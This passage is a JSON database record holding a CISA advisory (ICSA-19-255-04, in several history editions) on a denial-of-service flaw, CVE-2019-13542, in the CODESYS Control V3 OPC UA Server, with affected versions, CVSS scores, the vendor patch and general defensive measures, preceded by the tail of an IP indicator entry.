{"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "e1f48e147806d10e6da0f0d316330810"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "9db2042d727cbcc46c151cccdb765dd7"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "a734c514cac6d7194bfc5866791bcd40"}, {"key": "modified", "hash": "fd3b50b4e1478a504b3ea22d151cd89f"}, {"key": "published", "hash": "88bcedc8f3c524991e765ecbf0ffcec4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "title", "hash": "9a6f20ea3ff029f7e0af88680ba23524"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "8d8c46e2fd424e93e582156b0c039fbcf807646c2fce932e1090a7dc3fe1969a", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["162.210.173.6"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.45, "ioc_src": 56.12, "ioc_tags": 0.8, "ioc_total": 20}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "United States", "region": ""}, "asn": {"cloud": "", "domains": 13542, "firstip": {"netv4": "162.210.172.0", "num": "2731715584"}, "isp": "FORKNETWORKING", "lastip": {"netv4": "162.210.173.255", "num": "2731716095"}, "num": 46841, "org": "Fork Networking LLC"}}], "ics": [{"id": "ICSA-19-255-04", "hash": "a6659a6a5779823e0e503a40ac367b9d", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04>); we'd welcome your feedback.\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://www.us-cert.gov/ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://cwe.mitre.org/data/definitions/476.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "https://www.codesys.com/download/", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "https://www.us-cert.gov/ics/recommended-practices", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2021-07-28T18:29:26", "history": [{"bulletin": {"id": "ICSA-19-255-04", "hash": "3b190c7c4feeb559e141e85696fba91041652bd4711417e5bf3d155bece2b00d", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.dhs.gov/privacy-policy", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.dhs.gov/plain-writing-dhs", "https://www.codesys.com/download/", "https://www.oig.dhs.gov/", "/forms/feedback?helpful=yes&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.dhs.gov/freedom-information-act-foia", "http://twitter.com/icscert", "https://cwe.mitre.org/data/definitions/476.html", "/forms/feedback?helpful=somewhat&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.usa.gov/", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.us-cert.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "/forms/feedback?helpful=no&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://www.us-cert.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2019-09-12T20:40:55", "history": [], "viewCount": 50, "enchantments": {"dependencies": {"modified": "2019-09-12T20:40:55", "references": [{"idList": ["CVE-2019-13542"], "type": "cve"}]}, "score": {"modified": "2019-09-12T20:40:55", "value": 6.5, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2019-09-12T20:40:55", "differentElements": ["cvss", "description", "references"], "edition": 1}, {"bulletin": {"id": "ICSA-19-255-04", "hash": "bda87ffdf205457ae9cc627aa216f6f807c0b190e3e32d2e36f524a620ae5e0a", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Critical Manufacturing\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Germany\n\n### 3.4 RESEARCHER\n\n3S-Smart Software Solutions GmbH reported this vulnerability to CISA.\n\n## 4\\. MITIGATIONS\n\n3S-Smart Software Solutions GmbH has released Version 3.5.15.0 to resolve this vulnerability for all affected CODESYS products.\n\nPlease visit the CODESYS update page for more information on how to obtain the software update: [https://www.codesys.com/download/ ](<https://www.codesys.com/download/>)\n\nAs part of a security strategy, 3S-Smart Software Solutions GmbH recommends the following general defense measures to reduce the risk of exploits: \n\n * Use controllers and devices only in a protected environment to minimize network exposure and ensure that they are not accessible from outside.\n * Use firewalls to protect and separate the control system network from other networks.\n * Use VPN (virtual private networks) tunnels if remote access is required.\n * Activate and apply user management and password features.\n * Limit the access to both development and control system by physical means, operating system features, etc.\n * Protect both development and control system by using up to date virus detecting solutions. For more information and general recommendations for protecting machines and plants, see also the CODESYS security whitepaper at <https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf>\n\nFor more information, 3S-Smart Software Solutions GmbH has released a security report that can be viewed at the following link: \n<https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf>\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://www.us-cert.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.gov](<https://www.us-cert.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.gov](<https://www.us-cert.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://www.us-cert.gov/ics \nor incident reporting: https://www.us-cert.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "published": "2019-09-12T00:00:00", "modified": "2019-09-12T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov//ics/advisories/icsa-19-255-04", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.us-cert.gov/ics/recommended-practices", "https://www.whitehouse.gov/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.dhs.gov/plain-writing-dhs", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "https://www.codesys.com/download/", "https://www.oig.dhs.gov/", "/forms/feedback?helpful=somewhat&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.dhs.gov/freedom-information-act-foia", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2Ficsa-19-255-04", "http://twitter.com/icscert", "https://cwe.mitre.org/data/definitions/476.html", "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B", "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.dhs.gov/", "/forms/feedback?helpful=yes&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://customers.codesys.com/fileadmin/data/customers/security/CODESYS-Security-Whitepaper.pdf", "https://www.codesys.com/fileadmin/data/customers/security/2019/Advisory2019-07_CDS-65080.pdf", "/forms/feedback?helpful=no&document=ICSA-19-255-04: 3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/icsa-19-255-04&site_name=US-CERT", "https://www.us-cert.gov/ics", "https://www.us-cert.gov/ics", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"], "cvelist": ["CVE-2019-13542"], "immutableFields": [], "lastseen": "2020-07-07T17:26:15", "history": [], "viewCount": 56, "enchantments": {"dependencies": {"modified": "2020-07-07T17:26:15", "references": [{"idList": ["ICSMA-20-184-01", "ICSA-20-063-04", "ICSA-15-293-03", "ICSA-11-110-01", "ICSA-16-327-01", "ICSA-19-134-03", "ICSA-18-100-02", "ICSA-16-259-01", "ICSA-12-047-01A", "ICSA-20-098-03", "ICSA-17-089-02", "ICSA-17-353-02", "ICSA-11-132-01A", "ICSA-15-071-01", "ICSA-10-147-01", "ICSA-16-126-01", "ICSA-15-253-01", "ICSA-15-013-02", "ICSA-20-133-02", "ICSA-18-107-02", "ICSA-20-049-02", "ICSA-14-275-02", "ICSA-17-285-03", "ICSA-20-105-07", "ICSA-19-043-06", "ICSA-19-050-04", "ICSA-12-341-01", "ICSA-12-325-01", "ICSA-13-095-02A", "ICSA-15-141-01A", "ICSA-14-269-01-SUPPLEMENT", "ICSA-18-046-04", "ICSA-17-234-04", "ICSA-20-051-01", "ICSA-20-042-13", "ICSA-19-192-06", "ICSMA-18-144-01", "ICSA-20-044-02", "ICSA-15-099-01E", "ICSA-18-347-03", "ICSA-14-261-01", "ICSA-17-129-02", "ICSA-20-014-03", "ICSA-19-162-02", "ICSA-20-014-02", "ICSA-15-246-02", "ICSA-20-128-01", "ICSA-20-105-05", "ICSA-19-008-02", "ICSA-17-222-01", "ICSA-20-105-04", "ICSA-16-161-01", "ICSA-12-349-01", "ICSA-13-053-02A", "ICSA-19-050-03", "ICSA-18-018-01A", "ICSA-16-196-03", "ICSA-20-105-08", "ICSA-15-008-02", "ICSA-20-189-01", "ICSA-18-352-06", "ICSA-14-105-03B", "ICSA-17-264-04", "ICSA-18-254-02", "ICSA-15-202-03B", "ICSA-15-048-02", "ICSA2012601", "ICSA-12-079-01", "ICSA-17-290-01", "ICSA-17-017-01", "ICSA2012602", "ICSA-13-045-01", "ICSA-18-284-02", "ICSA-19-038-02", "ICSA-18-200-01", "ICSA-19-029-01", "ICSA-16-070-02", "ICSA-13-248-01", "ICSA-13-018-01", "ICSA-20-091-02", "ICSA-19-073-02", "ICSMA-18-310-01", "ICSA-15-008-01A", "ICSA-18-270-02", "ICSA-15-153-02", "ICSMA-17-255-01", "ICSA-13-036-02", "ICSA-18-270-01", "ICSA-20-161-02", "ICSA-20-063-01", "ICSA-16-173-02", "ICSA-16-306-03", "ICSA-14-128-01", "ICSA-18-275-01", "ICSA-18-298-01", "ICSA-14-006-01", "ICSMA-17-332-01", "ICSA-14-105-02A", "ICSA-11-195-01", "ICSA-15-120-01"], "type": "ics"}, {"idList": ["CVE-2019-13542"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-07-07T17:26:15", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.4"}, "lastseen": "2020-07-07T17:26:15", "differentElements": ["description"], "edition": 2}, {"bulletin": {"id": "ICSA-19-255-04", "hash": "e96a4b4f3cc9f1e5660daa6395203741b83a530676b470aae50c91557a48d81d", "type": "ics", "bulletinFamily": "info", "title": "3S-Smart Software Solutions GmbH CODESYS Control V3 OPC UA Server", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 6.5**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** 3S-Smart Software Solutions GmbH\n * **Equipment: **CODESYS Control V3 OPC UA Server\n * **Vulnerability: **NULL Pointer Reference\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a denial-of-service condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following CODESYS Control V3 runtime systems, all Versions 3.5.11.0 to 3.5.15.0, containing the CODESYS OPC UA Server supporting OPC UA Security, are affected:\n\n * CODESYS Control for BeagleBone\n * CODESYS Control for emPC-A/iMX6\n * CODESYS Control for IOT2000\n * CODESYS Control for Linux\n * CODESYS Control for PFC100\n * CODESYS Control for PFC200\n * CODESYS Control for Raspberry Pi\n * CODESYS Control RTE V3\n * CODESYS Control RTE V3 (for Beckhoff CX)\n * CODESYS Control Win V3 (also part of the CODESYS Development System setup)\n * CODESYS Control V3 Runtime System Toolkit\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [NULL POINTER DEREFERENCE CWE-476](<https://cwe.mitre.org/data/definitions/476.html>)\n\nSending specific crafted requests from a trusted OPC UA client may cause a NULL pointer dereference, which may trigger a denial-of-service condition.\n\n[CVE-2019-13542](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13542>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is 